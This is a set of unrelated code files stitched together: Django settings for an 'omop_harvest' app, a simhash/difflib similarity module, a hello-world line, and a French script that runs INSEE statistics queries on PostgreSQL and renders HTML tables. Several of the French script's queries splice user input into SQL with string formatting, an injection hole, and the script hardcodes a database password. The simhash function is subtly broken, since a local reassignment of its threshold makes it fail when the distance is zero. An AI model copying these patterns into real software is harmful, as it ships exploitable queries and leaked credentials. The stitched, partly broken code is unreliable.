# SITEAUTH_ACCESS_ORDER = 'allow/deny'
#
SITEAUTH_ALLOW_URLS = (
r'^log(in|out)/',
r'^password/reset/',
r'^(register|verify)/',
)
SITEAUTH_DENY_URLS = (
r'^workspace/',
r'^workspace/discover/',
r'^query/',
r'^results/+',
r'^api/+',
r'^details/\d+/',
r'^moderate/+',
r'^verify/+',
)
#
# MIDDLEWARE
#
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'siteauth.middleware.SiteAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'serrano.middleware.SessionMiddleware',
)
#
# EMAIL
#
SUPPORT_EMAIL = 'cbmisupport@email.chop.edu'
DEFAULT_FROM_EMAIL = 'cbmisupport@email.chop.edu'
EMAIL_SUBJECT_PREFIX = '[omop_harvest] '
SEND_BROKEN_LINK_EMAILS = False
#
# LOGGING
#
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
}
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'default': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'logs/omop_harvest.log',
'maxBytes': 1024*1024*5, # 5 MB
'backupCount': 5,
'formatter': 'standard',
},
'request_handler': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'logs/omop_harvest_requests.log',
'maxBytes': 1024*1024*5, # 5 MB
'backupCount': 5,
'formatter': 'standard',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
}
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'DEBUG',
'propagate': True
},
'django.request': {
'handlers': ['request_handler'],
'level': 'DEBUG',
'propagate': False
},
'avocado': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
'serrano': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
}
}
#
# CACHE
#
# For production environments, the memcached backend is highly recommended
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique',
'KEY_PREFIX': 'omop_harvest',
'VERSION': 1,
}
}
CACHE_MIDDLEWARE_SECONDS = 0
# This is not necessary to set if the above `KEY_PREFIX` value is set since
# the `KEY_PREFIX` namespaces all cache set by this application
CACHE_MIDDLEWARE_KEY_PREFIX = 'omop_harvest'
#
# SESSIONS AND COOKIES
#
CSRF_COOKIE_NAME = 'omop_harvest_csrftoken'
# SESSION_COOKIE_AGE = 60 * 20
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
SESSION_COOKIE_NAME = 'omop_harvest_sessionid'
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_SAVE_EVERY_REQUEST = False
#
# OTHER PROJECT SETTINGS
#
# USE_ETAGS = True
IGNORABLE_404_PATHS = (
r'robots.txt$',
r'favicon.ico$',
)
#
# VARIOUS APP SETTINGS
#
# The primary key of the ``Site`` object for the Sites Framework
SITE_ID = 1
#
# ModelTrees Configuration
#
MODELTREES = {
'default': {
'model': 'omop_harvest.Person',
}
}
#
# Haystack Configuration
#
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(os.path.dirname(__file__), '../../whoosh.index'),
}
}
#
# Avocado Configuration
#
# TODO: Should data_cache_enabled be set to True?
AVOCADO = {
'DATA_CACHE_ENABLED': False,
'METADATA_MIGRATION_APP': 'omop_harvest',
}
|
# -*- coding: utf-8 -*-
__author__ = 'CongRong <tr3jer@gmail.com>'
import difflib
from .utils.compat import bytes_decode, xrange
hashbits = 128
difflib_threshold = 0.95
simhash_threshold = 0.95
def simhash(tokens):
v = [0] * hashbits
for t in [string_hash(x) for x in tokens]:
for i in xrange(hashbits):
bitmask = 1 << i
if t & bitmask:
v[i] += 1
else:
v[i] -= 1
fingerprint = 0
for i in xrange(hashbits):
if v[i] >= 0:
fingerprint += 1 << i
return fingerprint
def string_hash(source):
if source == "":
return 0
else:
x = ord(source[0]) << 7
m = 1000003
mask = 2 ** hashbits - 1
for c in source:
x = ((x * m) ^ ord(c)) & mask
x ^= len(source)
if x == -1:
x = -2
return x
def hamming_distance(hash1, hash2):
x = (hash1 ^ hash2) & ((1 << hashbits) - 1)
tot = 0
while x:
tot += 1
x &= x - 1
return tot
def similar(content1, content2, engine='difflib'):
'''
:param content1: content1
:param content2: content2
:param engine: [optional] diiflib / simhash, Default By difflib
:return: Bool
'''
content1, content2 = map(lambda x: bytes_decode(x), [content1, content2])
sim = False
if engine == 'difflib':
if difflib.SequenceMatcher(None, content1, content2).quick_ratio() > difflib_threshold: sim = True
elif engine == 'simhash':
hash1 = simhash(content1.split())
hash2 = simhash(content2.split())
hamming = hamming_distance(hash1, hash2)
res = float(hashbits - hamming) / hashbits
if hamming: simhash_threshold = 0.90
sim = True if res >= simhash_threshold else False
return sim
|
print('Hello, World.')
# CONSOLE OUTPUT:
# Hello, World.
|
#================================================================
# Ensemble de requΓͺtes SQL sur une base de donnΓ©es SQL
# hΓ©bergΓ©es sur un serveur local postgresql
#
# Modules pythons nΓ©cessaires
# psycopg2 (SQL connection)
# pandas (DataFrame et HTML)
# matplotlib
# jinja2 (styles HTML)
#
# Alexandre Cornier - 2020
#================================================================
import psycopg2
import pandas as pd
import webbrowser
import pathlib
# Interrupteur d'affichage console
bconsole = False # pas d'affichage console par dΓ©faut
#---------------------------- Connection Γ la Base de DonnΓ©es ------------------------------------
connection = psycopg2.connect("host=localhost port=5432 dbname=cremi user=postgres password=Audierne")
cur = connection.cursor()
#-------------------------------------- Fonctions ------------------------------------------------
# Affichage HTML des rΓ©sultats dans le navigateur
def affiche_html(titre_question, question, fichier, resultat_html):
# PrΓ©paration de l'entΓͺte du fichier HTML
header = """<!DOCTYPE html>
<html>
<head>
<title>""" + titre_question + """</title>
</head>
<body>
<h1>""" + titre_question + """</h1>
<p>""" + question + """</p>
"""
footer = """
</body>
</html>"""
# write html to file
text_file = open(fichier, "w")
text_file.write(header)
text_file.write(resultat_html)
text_file.write(footer)
text_file.close()
# open report.html in browser
current_path = pathlib.Path(__file__).parent.absolute()
fichier = "file://" + str(current_path) + "/" + fichier
webbrowser.open(fichier)
# Question 1
def listeRegions():
cur.execute("""SELECT reg, libelle FROM regions ORDER BY reg""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "RΓ©gion" else '' for i in x])
.hide_index()
.render())
affiche_html("Question 1", "RΓ©gions prΓ©sentes dans la base de donnΓ©es",\
"question_01.html", html)
if (bconsole):
print("les rΓ©gions prΓ©sentes dans la base de donnΓ©es sont : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 2
def listeDepartement():
cur.execute("""SELECT dep, libelle FROM departements ORDER BY dep""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code dΓ©partement', 'DΓ©partement'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.hide_index()
.render())
affiche_html("Question 2", "DΓ©partements prΓ©sents dans la base de donnΓ©es",\
"question_02.html", html)
if (bconsole):
print("les dΓ©partements prΓ©sents dans la base de donnΓ©es sont : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 3
def choixRegions():
print("Donnez le nom de la rΓ©gion :")
choix = input().capitalize()
cur.execute("""SELECT * FROM regionsocial WHERE region = '%s' """ % choix)
lst = []
for info in cur.fetchall():
lst=[["NumΓ©ro", info[0]],
["Taux de pauvretΓ© (%)", info[2]],
["Part des jeunes non insΓ©rΓ©s (%) en 2014", info[3]],
["Part des jeunes non insΓ©rΓ©s (%) en 2009", info[4]],
["Poids de l'Γ©conomie sociale dans les emplois salariΓ©s du territoire (%)", info[5]]]
df = pd.DataFrame(lst, columns=['Information', 'Valeur'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.set_properties(subset=["Valeur"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 3", "Informations concernant la rΓ©gione " + choix,\
"question_03.html", html)
if (bconsole):
print("-------------- Informations concernant", choix, "--------------")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 4
def choix_departement_theme():
print("Donnez le nom du dΓ©partement :")
choix1 = input().capitalize()
print("Choisissez un thème : 1.Social ou 2.Environnement (par défaut)")
choix2 = input()
lst = []
if choix2 == "1" or choix2.lower() == "social":
cur.execute("""SELECT * FROM departementsocial WHERE departements = '%s' """ % choix1)
for info in cur.fetchall():
lst = [["NumΓ©ro", info[0]],
["EspΓ©rance de vie des hommes Γ la naissance en 2015 (annΓ©es)", info[2]],
["EspΓ©rance de vie des hommes Γ la naissance en 2010 (annΓ©es)", info[3]],
["EspΓ©rance de vie des femmes Γ la naissance en 2015 (annΓ©es)", info[4]],
["EspΓ©rance de vie des femmes Γ la naissance en 2010 (annΓ©es)", info[5]],
["Part de la population Γ©loignΓ©e de plus de 7 mn des services de santΓ© de proximitΓ© (%) en 2016", info[6]],
["Part de la population estimΓ©e en zone inondable (%)", info[7]]]
df = pd.DataFrame(lst, columns=['Information', 'Valeur'])
df["Valeur"] = pd.to_numeric(df["Valeur"], errors='coerce')
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.format({"Valeur": "{:.1f}"})
.set_properties(subset=["Valeur"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 4a",\
"Informations sociales concernant le dΓ©partement " + choix1,\
"question_04a.html", html)
if (bconsole):
df["Valeur"] = df["Valeur"].map("{:.1f}".format)
print("-------------- Informations concernant", choix1, "--------------")
print(df)
else :
cur.execute("""SELECT * FROM departementenvironnement WHERE departements = '%s' """ % choix1)
for info in cur.fetchall():
lst = [["NumΓ©ro", info[0]],
["Taux de valorisation matière et organique (%) en 2013", info[2]],
["Taux de valorisation matière et organique (%) en 2009", info[3]],
["Part de surfaces artificialisΓ©es (%) en 2012", info[4]],
["Part de surfaces artificialisΓ©es (%) en 2006", info[5]],
["Part de l'agriculture biologique dans la surface agricole totale (%) en 2016", info[6]],
["Part de l'agriculture biologique dans la surface agricole totale (%) en 2010", info[7]],
["Production de granulats (tonnes) en 2014", info[8]],
["Production de granulats (tonnes) en 2009", info[9]],
["Eolien (%) en 2015", info[10]],
["Eolien (%) en 2010", info[11]],
["PhotovoltaΓ―que (%) en 2015", info[12]],
["PhotovoltaΓ―que (%) en 2010", info[13]],
["Autre (biogaz, biomasse, gΓ©othermie, incinΓ©ration de dΓ©chets, petite hydraulique) (%) en 2015",info[14]],
["Autre (biogaz, biomasse, gΓ©othermie, incinΓ©ration de dΓ©chets, petite hydraulique) (%) en 2010",info[15]]]
df = pd.DataFrame(lst, columns=['Information', 'Valeur'])
df["Valeur"] = pd.to_numeric(df["Valeur"], errors='coerce')
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.format({"Valeur": "{:.1f}"})
.set_properties(subset=["Valeur"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 4b",\
"Informations environnementales concernant le dΓ©partement " + choix1,\
"question_04b.html", html)
if (bconsole):
df["Valeur"] = df["Valeur"].map("{:.1f}".format)
print("-------------- Informations concernant", choix1, "--------------")
print(df)
if (bconsole):
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 5
def typeEnergie():
print("Choisissez un type d'energie : 1.Eolien, 2.Photovoltaique ou 3.Autre")
choix = input()
if choix == "1" or choix.lower() == "eolien":
cur.execute("""SELECT nb, departements, eolien2015 - eolien2010 AS croissance FROM departementenvironnement
WHERE eolien2015 > eolien2010
ORDER BY eolien2015 - eolien2010 DESC""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code', 'DΓ©partement', 'Croissance'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Croissance"])
.format({"Croissance": "{:.1f}pts"})
.set_properties(subset=["Croissance"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 5a",\
"DΓ©partements oΓΉ la part de l'Γ©nergie Γ©olienne a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence",\
"question_05a.html", html)
if (bconsole):
df["Croissance"] = df["Croissance"].map("{:.1f}pts".format)
print(
"Voici la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence : ")
print(df)
if choix == "2" or choix.lower() == "photovoltaique":
cur.execute("""SELECT nb, departements, photovoltaique2015 - photovoltaique2010 AS croissance FROM departementenvironnement
WHERE photovoltaique2015 > photovoltaique2010
ORDER BY photovoltaique2015 - photovoltaique2010 DESC""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code', 'DΓ©partement', 'Croissance'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Croissance"])
.format({"Croissance": "{:.1f}pts"})
.set_properties(subset=["Croissance"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 5b",\
"DΓ©partements oΓΉ la part de l'Γ©nergie photovoltaΓ―que a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence",\
"question_05b.html", html)
if (bconsole):
df["Croissance"] = df["Croissance"].map("{:.1f}pts".format)
print("Voici la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence : ")
print(df)
if choix == "3" or choix.lower() == "autre":
cur.execute("""SELECT nb, departements, autre2015 - autre2010 AS croissance FROM departementenvironnement
WHERE autre2015 > autre2010
ORDER BY autre2015 - autre2010 DESC""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code', 'DΓ©partement', 'Croissance'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Croissance"])
.format({"Croissance": "{:.1f}pts"})
.set_properties(subset=["Croissance"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 5c",\
"DΓ©partements oΓΉ la part des Γ©nergies renouvelables autres a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence",\
"question_05c.html", html)
if (bconsole):
df["Croissance"] = df["Croissance"].map("{:.1f}pts".format)
print("Voici la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence : ")
print(df)
if (bconsole):
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 6
def tonnes():
cur.execute("""SELECT departements.reg, regions.libelle AS region, departements.libelle AS departement
FROM departements, regions
WHERE departements.reg
IN (SELECT departements.reg from departements
INNER JOIN departementenvironnement
ON departements.dep = departementenvironnement.nb
INNER JOIN regions
ON departements.reg = regions.reg
GROUP BY departements.reg
HAVING SUM(prodgranulat2014) > 25000000
AND SUM(prodgranulat2014) <> 'NaN')
ORDER BY region, departement""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion', 'DΓ©partement'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.hide_index()
.render())
affiche_html("Question 6",\
"DΓ©partements dont la rΓ©gion a eu une production de granulats supΓ©rieure Γ 25 000 000 tonnes en 2014",\
"question_06.html", html)
if (bconsole):
print("les dΓ©partements dont la rΓ©gion a eu une production de granulats supΓ©rieure Γ 25 000 000 tonnes en 2014 sont :")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 7
def topFive():
cur.execute("""SELECT nb, departements, eolien2015 FROM departementenvironnement
ORDER BY nullif(eolien2015, 'NaN')
DESC nulls last LIMIT 5""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code dΓ©partement', 'DΓ©partement', "Part de l'Γ©nergie Γ©olienne en 2015"])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Part de l'Γ©nergie Γ©olienne en 2015"])
.format({"Part de l'Γ©nergie Γ©olienne en 2015": "{:.1f}%"})
.set_properties(subset=["Part de l'Γ©nergie Γ©olienne en 2015"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 7",\
"Les 5 dΓ©partements avec le plus grand taux dβΓ©nergie Γ©olienne comme source de la puissance Γ©lectrique en 2015",\
"question_07.html", html)
if (bconsole):
df["Part de l'Γ©nergie Γ©olienne en 2015"] = df["Part de l'Γ©nergie Γ©olienne en 2015"].map("{:.1f}%".format)
print("Les 5 dΓ©partements avec le plus grand taux dβΓ©nergie Γ©olienne comme source de la puissance Γ©lectrique en 2015 sont :")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 8
def weak():
cur.execute("""SELECT regions.reg, regions.libelle AS region,
departements.libelle AS departement, departementenvironnement.valorisationorga2013
FROM departements
INNER JOIN regions
ON departements.reg = regions.reg
INNER JOIN departementenvironnement
ON departements.dep = departementenvironnement.nb
ORDER BY nullif(valorisationorga2013, 'NaN') nulls last LIMIT 1""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion', 'DΓ©partement', 'Valorisation en 2013'])
# Formattage des valeurs
df["Valorisation en 2013"] = df["Valorisation en 2013"].map("{:.1f}".format)
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "RΓ©gion" else '' for i in x])
.set_properties(subset=["Valorisation en 2013"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 8",\
"Région où se trouve le département ayant le plus faible taux de valorisation matière et organique en 2013",\
"question_08.html", html)
if (bconsole):
print("La région où se trouve le département ayant le plus faible taux de valorisation matière et organique en 2013 est :")
print("Reg, RΓ©gion, DΓ©partement, Valorisation2013")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 9
def bestPopMin():
cur.execute("""SELECT departementenvironnement.departements, departementenvironnement.agriculturebio2016
FROM departementenvironnement
INNER JOIN departementsocial
ON departementenvironnement.departements = departementsocial.departements
ORDER BY nullif(popeloignee7min, 'NaN') DESC nulls last LIMIT 1""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['DΓ©partement', "Part de l'agriculture biologique"])
# Formattage des valeurs
df["Part de l'agriculture biologique"] = df["Part de l'agriculture biologique"].map("{:.1f}%".format)
titre_html = "Part en 2016 (en %) de lβagriculture biologique dans la surface agricole totale du dΓ©partement<br>" +\
"contenant le plus grand pourcentage de population Γ©loignΓ©e de plus de 7 minutes des services de santΓ© de proximitΓ©"
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "Part de l'agriculture biologique" else '' for i in x])
.set_properties(subset=["Part de l'agriculture biologique"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 9", titre_html, "question_09.html", html)
if (bconsole):
print("En 2016, la part (en %) de lβagriculture biologique dans la surface agricole totale du dΓ©partement")
print("contenant le plus grand pourcentage de population Γ©loignΓ©e de plus de 7 minutes des services de santΓ© de proximitΓ© est : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 10
def pauvrete():
cur.execute("""SELECT pauvrete,region
FROM regionsocial
WHERE jeunesnoninseres2014 > 30
AND pauvrete <> 'NaN'
ORDER BY nullif(pauvrete, 'NaN') DESC nulls last""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['PauvretΓ©', 'RΓ©gion'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "PauvretΓ©" else '' for i in x])
.format({"PauvretΓ©": "{:.2f}%"})
.set_properties(subset=["PauvretΓ©"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 10",\
"Taux de pauvretΓ© connu en 2014 des rΓ©gions dont la part des jeunes non insΓ©rΓ©s est supΓ©rieure Γ 30% en 2014",\
"question_10.html", html)
if (bconsole):
df["PauvretΓ©"] = df["PauvretΓ©"].map("{:.2f}%".format)
print("Le taux de pauvretΓ© connu en 2014 des rΓ©gions dont la part des jeunes non insΓ©rΓ©s est supΓ©rieure Γ 30% en 2014 sont : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 11
def poids_eco():
cur.execute("""SELECT regions.reg, regions.libelle, poidseco,
AVG(photovoltaique2015) AS photovoltaique2015,
AVG(agriculturebio2016) AS agriculturebio2016
FROM departements
INNER JOIN departementenvironnement
ON departements.dep = departementenvironnement.nb
INNER JOIN regionsocial
ON departements.reg = regionsocial.nb
INNER JOIN regions
ON departements.reg = regions.reg
GROUP BY poidseco, regions.reg
HAVING AVG(photovoltaique2015) >= 10
AND AVG(photovoltaique2015) <> 'NaN'
AND AVG(agriculturebio2016) >= 5
AND AVG(agriculturebio2016) <> 'NaN'
ORDER BY poidseco""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion', "Poids de l'Γ©conomie sociale",\
"Part moyenne du photovoltaΓ―que", "Part moyenne de l'agriculture Bio"])
# Conversion string vers float pour le formattage
df["Part moyenne du photovoltaΓ―que"] = pd.to_numeric(df["Part moyenne du photovoltaΓ―que"], errors='coerce').fillna(0)
df["Part moyenne de l'agriculture Bio"] = pd.to_numeric(df["Part moyenne de l'agriculture Bio"], errors="coerce").fillna(0)
titre_html = "Poids de l'Γ©conomie sociale en 2015 dans les emplois salariΓ©s de la rΓ©gion<br>" +\
"dont la source de la puissance Γ©lectrique en Γ©nergies renouvelables provenait Γ au moins 10% de l'Γ©nergie photovoltaΓ―que<br>" +\
"et dont la part de l'agriculture biologique dans la surface agricole totale Γ©tait d'au moins 5%"
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.set_properties(subset=["Poids de l'Γ©conomie sociale", "Part moyenne du photovoltaΓ―que",
"Part moyenne de l'agriculture Bio"], **{'text-align': 'right'})
.hide_index()
.background_gradient(cmap='Blues', subset=["Poids de l'Γ©conomie sociale"])
.format({"Poids de l'Γ©conomie sociale": "{:.1f}%"})
.format({"Part moyenne du photovoltaΓ―que": "{:.1f}%"})
.format({"Part moyenne de l'agriculture Bio": "{:.1f}%"})
.render())
affiche_html("Question 11", titre_html, "question_11.html", html)
if (bconsole):
df["Poids de l'Γ©conomie sociale"] = df["Poids de l'Γ©conomie sociale"].map("{:.1f}%".format)
df["Part moyenne du photovoltaΓ―que"] = df["Part moyenne du photovoltaΓ―que"].map("{:.1f}%".format)
df["Part moyenne de l'agriculture Bio"] = df["Part moyenne de l'agriculture Bio"].map("{:.1f}%".format)
print("Poids de l'Γ©conomie sociale en 2015 dans les emplois salariΓ©s de la rΓ©gion")
print("dont la source de la puissance Γ©lectrique en Γ©nergies renouvelables provenait Γ au moins 10% de l'Γ©nergie photovoltaΓ―que")
print("et dont la part de l'agriculture biologique dans la surface agricole totale Γ©tait d'au moins 5%")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
def menu():
print ("")
print ("------------------------------------ Projet INSEE -----------------------------------")
print ("")
print ("1...Afficher la liste des rΓ©gions")
print ("2...Afficher la liste des dΓ©partements")
print ("3...Demander Γ lβutilisateur de choisir une rΓ©gion et afficher les donnΓ©es de la region choisie")
print ("4...Demander Γ lβutilisateur de choisir un dΓ©partement et un thΓ¨me : social ou environnemental,")
print (" | et afficher les donnΓ©es demandΓ©es pour le departement choisi")
print ("5...demander Γ lβutilisateur de choisir un type dβΓ©nergie (Γ©olien, photovoltaΓ―que, autre)")
print (" | et en fonction de ce choix retourner la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ©")
print (" | entre les deux annΓ©es de rΓ©fΓ©rence, classΓ©s de la plus forte augmentation Γ la plus faible.")
print ("6...les dΓ©partements dont la rΓ©gion a eu une production de granulats supΓ©rieure Γ 25 000 000 tonnes en 2014")
print ("7...les 5 dΓ©partements avec le plus grand taux dβΓ©nergie Γ©olienne comme source de la puissance Γ©lectrique en 2015")
print ("8...La région où se trouve le département ayant le plus faible taux de valorisation matière et organique en 2013")
print ("9...La part (en %) de lβagriculture biologique dans la surface agricole totale du dΓ©partement contenant")
print (" | le plus grand pourcentage de population Γ©loignΓ©e de plus de 7 minutes des services de santΓ© de proximitΓ© en 2016")
print ("10..Le taux de pauvretΓ© en 2014 des rΓ©gions dont la part des jeunes non insΓ©rΓ©s est supΓ©rieure Γ 30% en 2014 ")
print ("11..Le poids de l'Γ©conomie sociale dans les emplois salariΓ©s de la rΓ©gion dont la source de la puissance Γ©lectrique")
print (" | en Γ©nergies renouvelables provenait Γ au moins 10% de lβΓ©nergie photovoltaΓ―que et dont la part")
print (" | de lβagriculture biologique dans la surface agricole totale Γ©tait dβau moins 5% en 2015")
print ("")
print ("0...Quitter")
print ("-------------------------------------------------------------------------------------")
#----------------------------------------- MAIN --------------------------------------------------
# Demande d'affichae console ou non, HTML seul par dΓ©faut
